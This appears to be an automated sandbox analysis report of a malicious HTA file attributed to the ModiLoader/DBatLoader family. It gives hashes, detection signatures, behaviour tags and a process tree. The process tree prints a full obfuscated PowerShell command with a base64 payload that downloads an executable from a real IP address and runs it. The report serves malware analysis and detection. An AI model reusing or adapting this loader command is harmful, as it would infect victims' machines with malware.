Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-12-2024 13:32
Behavioral task
behavioral1
Sample
greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta
Resource
win10v2004-20241007-en
General
-
Target
greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta
-
Size
144KB
-
MD5
5590c12b4f62de6de143d675d7681db0
-
SHA1
e7f0a97a22c0c11336e1cbc37fee2e31adbf01ee
-
SHA256
3057554d997baa307152ad177f47430aa1b8748f2021c8080cc6876016829b23
-
SHA512
eb62448a56f6de94d8671c7bb6d882c56d802afbfbb49baa22cea344991736e34e320f9a0786397bffaf43afae6b7ac77f05ab29218a04e9ec68dd2eea37f891
-
SSDEEP
768:t1EHfLum2oum2J5KUJDVUKhC74GVf/Aq2v9PV8aQP2eLPyqv6vRc6cfzqfz4Asfc:tz
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
resource yara_rule behavioral1/memory/2528-33-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-36-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-39-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-44-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-46-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-38-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-37-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-53-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-52-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-58-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-60-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-59-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-40-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-66-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-70-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-41-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-74-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-42-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-77-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-80-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-78-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-75-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-72-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-86-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-43-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-83-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-69-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-67-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-64-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-90-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-88-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-62-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-55-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-50-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-95-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-92-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-49-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-97-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-99-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-102-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-104-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-106-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-108-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-111-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-45-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-113-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-116-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-68-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-79-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-76-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-73-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-71-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-65-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-63-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-61-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-57-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-56-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-54-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-51-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-48-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 behavioral1/memory/2528-47-0x0000000003500000-0x0000000004500000-memory.dmp modiloader_stage2 -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1848 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2388 cmd.exe 1848 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2528 nicerose.exe -
Loads dropped DLL 7 IoCs
pid Process 1848 powershell.exe 1848 powershell.exe 1848 powershell.exe 1848 powershell.exe 2600 WerFault.exe 2600 WerFault.exe 2600 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2600 2528 WerFault.exe 37 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nicerose.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1848 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1016 wrote to memory of 2388 1016 mshta.exe 30 PID 1016 wrote to memory of 2388 1016 mshta.exe 30 PID 1016 wrote to memory of 2388 1016 mshta.exe 30 PID 1016 wrote to memory of 2388 1016 mshta.exe 30 PID 2388 wrote to memory of 1848 2388 cmd.exe 32 PID 2388 wrote to memory of 1848 2388 cmd.exe 32 PID 2388 wrote to memory of 1848 2388 cmd.exe 32 PID 2388 wrote to memory of 1848 2388 cmd.exe 32 PID 1848 wrote to memory of 3064 1848 powershell.exe 33 PID 1848 wrote to memory of 3064 1848 powershell.exe 33 PID 1848 wrote to memory of 3064 1848 powershell.exe 33 PID 1848 wrote to memory of 3064 1848 powershell.exe 33 PID 3064 wrote to memory of 344 3064 csc.exe 34 PID 3064 wrote to memory of 344 3064 csc.exe 34 PID 3064 wrote to memory of 344 3064 csc.exe 34 PID 3064 wrote to memory of 344 3064 csc.exe 34 PID 1848 wrote to memory of 2528 1848 powershell.exe 37 PID 1848 wrote to memory of 2528 1848 powershell.exe 37 PID 1848 wrote to memory of 2528 1848 powershell.exe 37 PID 1848 wrote to memory of 2528 1848 powershell.exe 37 PID 2528 wrote to memory of 2600 2528 nicerose.exe 38 PID 2528 wrote to memory of 2600 2528 nicerose.exe 38 PID 2528 wrote to memory of 2600 2528 nicerose.exe 38 PID 2528 wrote to memory of 2600 2528 nicerose.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWERSHeLl.Exe -EX bypAsS -noP -w 1 -c DEVICeCreDEnTIaLDePLOYmEnT.EXe ; invoke-EXPresSIon($(InvoKe-ExpressION('[sYsTeM.TEXT.EnCOdiNG]'+[CHaR]58+[cHAR]58+'Utf8.geTSTriNg([SysTEM.CONvErt]'+[chAr]0X3a+[chAR]58+'FromBaSE64StRinG('+[chAr]0x22+'JFYwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0ZYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0c0FYcFFDSkpsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnYndUS2dWdEVIZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NZHVKcUpRUWFCLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUxUUUprTXlpIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhBVHFRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFYwOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTczLjIxNC4xNjcuNzQvNDQ0L25pY2Vyb3NlLmV4ZSIsIiRlbnY6QVBQREFUQVxuaWNlcm9zZS5leGUiLDAsMCk7c1RhclQtU0xFRVAoMyk7SW5WT0tFLWVYcFJFU3NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlcm9zZS5leGUi'+[ChAR]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERSHeLl.Exe -EX bypAsS -noP -w 1 -c DEVICeCreDEnTIaLDePLOYmEnT.EXe ; invoke-EXPresSIon($(InvoKe-ExpressION('[sYsTeM.TEXT.EnCOdiNG]'+[CHaR]58+[cHAR]58+'Utf8.geTSTriNg([SysTEM.CONvErt]'+[chAr]0X3a+[chAR]58+'FromBaSE64StRinG('+[chAr]0x22+'JFYwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0ZYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0c0FYcFFDSkpsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnYndUS2dWdEVIZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NZHVKcUpRUWFCLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUxUUUprTXlpIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhBVHFRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFYwOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTczLjIxNC4xNjcuNzQvNDQ0L25pY2Vyb3NlLmV4ZSIsIiRlbnY6QVBQREFUQVxuaWNlcm9zZS5leGUiLDAsMCk7c1RhclQtU0xFRVAoMyk7SW5WT0tFLWVYcFJFU3NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlcm9zZS5leGUi'+[ChAR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lqynby8e.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB349.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB348.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:344
-
-
-
C:\Users\Admin\AppData\Roaming\nicerose.exe"C:\Users\Admin\AppData\Roaming\nicerose.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 6965⤵
- Loads dropped DLL
- Program crash
PID:2600
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD56546cb3b0c56dbb1df5370f3469ae445
SHA1d48055e2e820876dc35b0508a2856d9eba702473
SHA2561e414dbe2313fb415fd1bd2663a2e7b1c2d62ef8568b283030977c58461e977b
SHA512551aafa2ec60615bf9bef622b807833f58dfa9a7e1d0fbb8815c7a75da3a82820a11fb118b3c254d19a3ace9e09afc2a1c317fc3df08a69619662bc0be4a9a25
-
Filesize
3KB
MD547de950bf241d3c9d0bc1e07a4044242
SHA10e9e4a67939d0ee3463b12533a6578cc52033f09
SHA256a9ccd000daef56e12db8a82872c25f6613ece9d4b552f5b527bfef93715da421
SHA5127c6dc688c4ce8b2c56516a2f04533841189fe35e20eead6a1973152d370bcfa99d83a9fc7d1318c6bd9d7fab31b65f6fb9cdfb4786a99f9b3a5504f480a47e68
-
Filesize
7KB
MD551acf3cd2944dcc47b3d037131bb6940
SHA12c6ba058942d86c5a433c6b9ecd10c763a476ab6
SHA2562fb3a308af3aa0a0b0fa13224035c00d6b6754cd1786cf3ac346155956dfba94
SHA5124a5c80d158016c1002a7138c37de8629172187c6290d7c0321efc19d83e24b36ee93664e0d48cb31194b4bf42a9de2bc5e2424f022f566f09a0eefa3daa71f1a
-
Filesize
652B
MD5743af1f6fd40c5de94c5b1d0fdb7f295
SHA1feb392218da9bf1ed6a2d2c297c0dba07c4224ce
SHA256f9c90f42659799c729f8dda41a952b5fa68e2ec335b07d0e96cf37c1986c9c65
SHA5122947fc4f430aa9122ed7d67941e4283356cd9c2b5d7892795ce8121e3abb036697512c5ca360b3877b2467000803a6d442168b2137b188bba6a7ea5c127b6781
-
Filesize
490B
MD53133a0e8a2a7f9bd3f2ff03a270769e4
SHA1f4314d0ccac807322c9b64778efccd2380a2604b
SHA2565baa6a713032bcdee2b788fb0217c44ed74d6a210346f34d443055aedb82b6d9
SHA512934f70d1ec8eb08b45084ecf51f4cec129f6ac0ceadbc8d1e306a4c492e99e017c6dc3d59084159bcaf44a3ea2a67af368d7f5e2f7f82d77598fd8c7a9d77e4c
-
Filesize
309B
MD59b8b30e63c27deb639482939166b4687
SHA17e587a28baf336e227fb9043914aad74d3f5b2f5
SHA2562afbcf0c49dfdd7aeabcabfc540b7d670b41fc7b4abdc8c972bfc1ab848f0d57
SHA512085ac7e17fe12b664f55847880a6aa3f829e34c785c9a39657514ed40119a83d7d89e4e3fdc577f1b019e6b401f3bc7abee160267de4f8b2efb5b571c8cf3a67
-
Filesize
1.3MB
MD5ccdcd04a0ffde31366754018598eb02f
SHA138492826e8febf5bd7da4f9d8a8379ec7044ca9a
SHA25663c77a3f6cfa94cbc6a4c0c1475f02520592e58d6a03e8553e77a85a3f03c32f
SHA5128059cf54a64b45598b39becb3ec02fdf4b5837e4dd84ac82d33334850d61d1b33df70da0a65857c33e9a0fe2dc3d405bdbf6fa7214ab68e471e2e0c0f7e31053